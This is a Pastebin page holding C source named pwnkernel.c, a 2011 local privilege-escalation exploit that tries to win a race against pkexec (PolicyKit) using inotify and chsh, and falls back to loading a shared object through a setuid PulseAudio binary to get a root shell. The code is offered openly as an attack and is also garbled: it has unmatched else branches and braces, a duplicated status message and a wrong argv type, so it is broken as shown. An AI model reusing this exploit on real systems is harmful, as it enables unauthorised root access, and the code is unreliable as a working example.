Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /* pwnkernel.c 2011 */
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <fcntl.h>
- #include <sys/personality.h>
- #include <sys/stat.h>
- #include <sys/types.h>
- #include <sys/inotify.h>
- #define PU_PATH "/usr/bin/pulseaudio"
- #define PK_PATH "/usr/bin/pkexec"
- #define PATH_TO_EXPLOIT "/home/teste/exploit.so"
- int main(int argc, int **argv) {
- int ret,fd;
- char pid_path[1024];
- struct stat fstat;
- ret = personality(PER_SVR4);
- if (ret == -1) {
- fprintf(stderr, "[-] Unable to set personality!\n");
- return 0;
- }
- fprintf(stdout, " [+] Personality set to: PER_SVR4 ..\n");
- if (stat(PU_PATH, &fstat)) {
- fprintf(stderr, "[-] PulseAudio doesnt exist!\n");
- return 0;
- }
- fprintf(stdout, " [+] Personality set to: PER_SVR4 ..\n");
- if (stat(PK_PATH, &fstat)) {
- fprintf(stderr, "[-] PolicyKit (2010) doesnt exist!\n");
- return 0;
- }
- fprintf(stderr, "[+] Gettin our PID for policykit exploiting ..\n");
- sprintf(pid_path, "/proc/%i", getpid()); // could maybe do like /proc/self/exe ,or other trix ;>
- close(0);
- close(1);
- close(2);
- fd = inotify_init();
- inotify_add_watch(fd, pid_path, IN_ACCESS);
- fprintf(stderr, "[+] Inotify watching ..\n");
- read(fd, NULL, 0);
- fprintf(stderr, "[!] Lets try exploit this race! chsh() first ..\n");
- execl("/usr/bin/chsh", "chsh", NULL);
- fprintf(stderr, "[+] Success! Now the MAIN pxexec() binary ..\n");
- execl(PK_PATH, "pkexec", "/bin/sh", NULL);
- fprintf(stderr, "[*] Got root using pkexec() local!\n");
- } else {
- sleep(2);
- }
- if (!(fstat.st_mode & S_ISUID) || fstat.st_uid != 0) {
- fprintf(stderr, "[-] Pulseaudio/PolicyKit-2010 is not suid root!\n");
- return 0;
- }
- fprintf(stderr, "[=] Failsafer running,try revive this exploit ..\n");
- execl(PU_PATH, PU_PATH, "--log-level=0", "-L", PATH_TO_EXPLOIT, NULL);
- } else {
- execl(PK_PATH, "pkexec", "/bin/su", "-c", "/bin/sh", PATH_TO_EXPLOIT, NULL);
- fprintf(stderr, "[*] Success ..\n");
- }
- return 0;
- }
- // E0F 2011
Add Comment
Please, Sign In to add comment